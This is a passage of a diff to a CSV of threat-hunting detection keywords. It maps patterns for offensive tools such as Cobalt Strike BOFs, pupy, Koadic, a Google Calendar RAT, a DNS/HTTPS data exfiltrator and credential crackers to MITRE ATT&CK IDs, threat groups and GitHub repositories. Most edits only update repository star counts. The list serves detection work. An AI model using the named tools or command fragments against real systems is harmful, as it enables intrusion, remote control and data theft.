Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*FuzzySecurity/Dendrobate*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*FuzzySecurity/Sharp-Suite*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*FuzzySecurity/Sharp-Suite*","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*fw_walk disable*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","0","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*g_hookedSleep.*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"*g0h4n/RDE1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*g0h4n/REC2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*g0h4n/RDE1*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*g0h4n/REC2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" "*G0ldenGunSec/GetWebDAVStatus*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*g0tmi1k*","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/g0tmi1k","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*g3tsyst3m/undertheradar*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","1","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" -"*gabriellandau/PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*gabriellandau/PPLFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*GadgetToJScript.csproj*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*GadgetToJScript.exe -a *","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","0","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*GadgetToJScript.sln*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*GadgetToJScript-master*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","1","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z" "*Gality369/CS-Loader*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" -"*GateTrampolin.asm*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","213","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*GateTrampolin.asm*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" "*gateway-finder*","offensive_tool_keyword","gateway-finder-imp","This is an improved version of original Gateway-finder. New version rebuilt with python3 and support for files with MACs/IPs The homepage of original project is: http://pentestmonkey.net/tools/gateway-finder Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.","T1016 - T1049 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Data Exfiltration","https://github.com/whitel1st/gateway-finder-imp","1","0","N/A","N/A","1","57","7","2020-12-14T09:52:29Z","2018-04-18T12:43:11Z" "*gather/keylogger*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" -"*gather/ldap_query*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*gather/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*gather/ldap_query*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*gather/peass.rb*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*gather/user_hunter*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*gatherer/gatherer.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" "*gato * attack*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","0","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" @@ -10512,31 +10663,31 @@ "*GCPBucketBrute*","offensive_tool_keyword","GCPBucketBrute","A script to enumerate Google Storage buckets. determine what access you have to them. and determine if they can be privilege escalated","T1083 - T1553 - T1210 - T1213","TA0001 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://github.com/RhinoSecurityLabs/GCPBucketBrute","1","0","N/A","N/A","5","406","82","2023-05-26T19:11:42Z","2019-02-26T03:56:22Z" "*GCR - Google Calendar RAT*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" "*GCR-Google-Calendar-RAT*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","1","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" -"*geacon*/cmd/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*geli2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*gemailhack.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","813","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" -"*gen -f py bind --port*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*gen -f py_oneliner connect *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*geacon*/cmd/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*geli2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gemailhack.py*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","7","9","815","385","2022-02-18T16:12:45Z","2018-04-19T13:48:41Z" +"*gen -f py bind --port*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*gen -f py_oneliner connect *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*genCrossC2 *","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*genCrossC2.*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*genCrossC2.Win.exe*","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 